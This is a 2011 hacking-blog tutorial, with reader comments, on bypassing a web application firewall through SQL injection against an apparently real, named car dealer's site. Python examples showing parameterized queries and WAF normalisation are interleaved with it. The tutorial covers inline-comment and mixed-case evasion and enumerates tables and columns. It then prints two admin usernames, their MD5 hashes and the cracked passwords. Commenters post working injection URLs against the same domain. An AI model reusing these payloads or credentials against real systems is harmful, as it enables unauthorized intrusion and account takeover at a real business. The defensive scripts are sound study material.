Friday, November 25, 2011

WAF Bypass Using SQL Injection


Video Demonstration

Hello Security Explorers, welcome to Security Explored.
This is the next tutorial in the SQL Injection series: WAF bypassing through SQL injection.
WAF stands for Web Application Firewall.
A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.
Now we are moving a step forward in SQL injection: advanced SQL injection.
In this tutorial I assume that you know basic SQL injection.
If you don't, then you should read my recent tutorial, which comes with a video demonstration.
Read that tutorial first.
Now I have an SQL-injectable site with a WAF enabled.
To check for the vulnerability,
It shows this error:
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY title ASC' at line 1”
This means it is vulnerable: the injected quote reached the MySQL parser. Note the `\'` in the message, which suggests the quote was escaped before being inserted into the query; because the value sits unquoted in a numeric comparison (`id=...`), escaping alone does not protect it, and only a parameterized query would.
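As an added illustration (not code from the original post, and not the site's actual source, which is unknown), the following Python script reproduces the three query-building styles implied by the error message above against a constructed in-memory SQLite table standing in for the `faq` table: plain concatenation, addslashes-style escaping of an unquoted numeric value, and a parameterized query. The table contents and column names are assumptions chosen only to make the script self-contained.

```python
import sqlite3

# Constructed stand-in for the site's faq table (assumption: the real schema is unknown).
ROWS = [(15, "Opening hours"), (16, "Returns policy")]


def make_db():
    """Create an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE faq (id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO faq VALUES (?, ?)", ROWS)
    return conn


def lookup_concatenated(conn, user_id):
    """Vulnerable pattern: the request value is pasted straight into the SQL text."""
    sql = "SELECT id, title FROM faq WHERE id=" + user_id + " ORDER BY title ASC"
    return conn.execute(sql).fetchall()


def lookup_escaped(conn, user_id):
    """addslashes-style escaping (hypothetical reconstruction of what produced the
    page's "near '\\' ORDER BY title ASC'" message). Still vulnerable: the value sits
    unquoted in a numeric comparison, so a quote or a UNION still reaches the parser."""
    escaped = user_id.replace("\\", "\\\\").replace("'", "\\'")
    sql = "SELECT id, title FROM faq WHERE id=" + escaped + " ORDER BY title ASC"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Fixed pattern: the value is bound as data, so it can never change the query shape."""
    sql = "SELECT id, title FROM faq WHERE id=? ORDER BY title ASC"
    return conn.execute(sql, (user_id,)).fetchall()


def probe(lookup, value):
    """Run one lookup style on a fresh database; report ('ok', rows) or ('error', message)."""
    conn = make_db()
    try:
        return ("ok", lookup(conn, value))
    except sqlite3.Error as exc:
        return ("error", str(exc))
    finally:
        conn.close()


if __name__ == "__main__":
    for value in ("15", "15'", "-15 UNION SELECT 1,2 --"):
        for lookup in (lookup_concatenated, lookup_escaped, lookup_parameterized):
            print(f"{lookup.__name__:22} {value!r:28} -> {probe(lookup, value)}")
```

The concatenated and escaped versions both raise a syntax error on the single quote (the SQLite wording differs from MySQL's, but the cause is the same), while the parameterized version simply finds no row, because the quote is data rather than SQL.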
Now to find the number of columns,
This means there are only 7 columns in the query.
Now the real thing starts.
Now to find the vulnerable columns,
On loading this URL we get this error:
Not Acceptable
An appropriate representation of the requested resource /faq2.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


This error comes from the WAF: it recognises the query as malicious and blocks it.
Now to bypass the WAF we are going to use MySQL inline comments, i.e. the `/*! ... */` syntax (the characters “/”, “*” and “!”).
We wrap these comments around the parts of the query on which we want the server to focus. A signature-based WAF matches the literal request text, whereas MySQL executes the body of a `/*! ... */` comment, so the query the database runs is unchanged while the text no longer matches the rule.
Now to bypass the WAF and get the vulnerable columns, we modify the syntax,
Here you see we get all the vulnerable columns.
Vulnerable columns are – 2,3,4,5,6
We are going to inject into these columns.
You will have noticed that I used a mixture of capital and small letters in “union all select”; this also helps with WAF bypass, since a case-sensitive signature does not match it.
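The two evasions just described (inline comments and mixed case) work only against rules that match the raw request text. As an added example from the detection side, not code from the original post or from any WAF product, the script below contrasts a naive literal signature with the same signature applied after normalisation (URL-decoding, stripping `/* */` comments, keeping the body of `/*! */` comments as MySQL does, collapsing whitespace and case). The sample query strings are constructed from the forms shown on this page plus benign traffic; normalisation narrows the gap but does not close it, and the real fix remains parameterized queries.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample query strings: the forms the page shows (plain, mixed case, inline
# comments, MySQL versioned comments) plus benign traffic. Not captured from any real site.
SAMPLES = {
    "plain":      "id=-15 union all select 1,2,3,4,5,6,7--",
    "mixed_case": "id=-15%20uniOn%20all%20seLect%201,2,3,4,5,6,7--",
    "comments":   "id=-15/**/uNiOn/**/SelEct/**/1,2,3,4,5,6,7--",
    "versioned":  "id=-15+/*!UnIoN*/+/*!50000SeLeCt*/+1,2,3,4,5,6,7--",
    "benign":     "id=15",
    "benign_txt": "q=credit+union+branches",
}

SIGNATURE = re.compile(r"\bunion\b(?:\s+all)?\s+select\b")


def naive_match(raw):
    """A literal, case-sensitive signature on the raw request text: the kind of rule the
    page's WAF evidently used. It catches the plain payload and nothing else."""
    return re.search(r"union (all )?select", raw) is not None


def normalize(raw):
    """Canonicalise the query string into the form MySQL will effectively parse."""
    s = unquote_plus(raw)
    # MySQL executes the body of /*! ... */ and /*!50000 ... */, so keep the body.
    s = re.sub(r"/\*!\d*\s*(.*?)\*/", r" \1 ", s, flags=re.S)
    # Ordinary /* ... */ comments are dropped by the parser; treat them as whitespace.
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    # Collapse whitespace and case so "uNiOn" and "union" compare equal.
    return re.sub(r"\s+", " ", s).strip().lower()


def detect(raw):
    """The same signature, applied to the normalised form."""
    return SIGNATURE.search(normalize(raw)) is not None


def compare(samples=SAMPLES):
    """Return {name: (naive_hit, normalized_hit)} for every sample."""
    return {name: (naive_match(q), detect(q)) for name, q in samples.items()}


if __name__ == "__main__":
    for name, (naive, norm) in compare().items():
        print(f"{name:11} naive={naive!s:5} normalized={norm}")
```

Running it shows the naive rule flagging only the plain payload, while the normalised rule flags all four injection forms and neither benign request.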
Now to get the MySQL database version and the current database.



You can get the MySQL version and the current database at the same time with this
The next thing, as you all know, is to get the table names; for this,

We get these tables - 9791614_offers,C1on33_offers,apr,faq,newsletter,users

As I want to extract the admin username and password, I will use the “users” table.
On some sites you have to provide more inline comments to get the table and column names, like
/*!table_name*/, which makes table_name part of the executed query while keeping it out of the WAF's signature match.
To get the columns,



Again, on some sites this will show a “Not Acceptable” error, so you have to add more inline comments and your URL will be,

You will get these columns - id,headline,offer,price,contact,id,headline,offer,price,contact,apr,updated,id,title,p1,p2,p3,p4,updated,id,email,name,surname,address,phone,curr_car,year,id,username,password,email

Again I need the username and password, so the columns I am going to dump are “username” and “password”.
To dump them,
Here we got this:

SeanMcB:be5f032a39040e000b0cc2bf0887d496,Clon33M:83d385aa20740f16ca7fee506e37fc48

Here you see we have two admins.
The usernames are SeanMcB and Clon33M.

be5f032a39040e000b0cc2bf0887d496   and  83d385aa20740f16ca7fee506e37fc48

are MD5 hashes of the passwords. MD5 is a one-way hash, so you cannot decrypt them; you need to crack them, which in practice means looking them up.
To do that, go to http://www.md5decrypter.co.uk
Paste your MD5 hash there, enter the captcha code and click on “decrypt hash”.
The plain text of
be5f032a39040e000b0cc2bf0887d496 is rZ23MHq
and of 83d385aa20740f16ca7fee506e37fc48 is Clon33


You now have the usernames and passwords.
The next thing is to find the admin page.
Again I recommend Havij for finding admin pages.
Here, in this case, the admin page is
If you have any problem or any query then feel free to contact me at     cyberdash@live.in


6 comments:

  1. I tested it,

    http://cloneemotorcentre.ie/faq2.php?id=-15/**/uNiOn/**/SelEct/**/1,2,3,4,5,6,7--

    can bypass it ....
  2. @独自等待 Yup, you can bypass it ...... you just need to provide inline comments in the syntax to bypass the WAF.
  3. Hi friends, I have a hacking blog for more tips and tricks

    www.indianhackersblog.blogspot.co.uk
  4. We can just change a letter to a capital, for example http://cloneemotorcentre.ie/faq2.php?id=-15%20uniOn%20all%20seLect%201,2,3,4,5,6,7--
  5. I can't log in with the admin's information. The site always says "Unknown column '83d385aa20740f16ca7fee506e37fc48' in 'where clause'"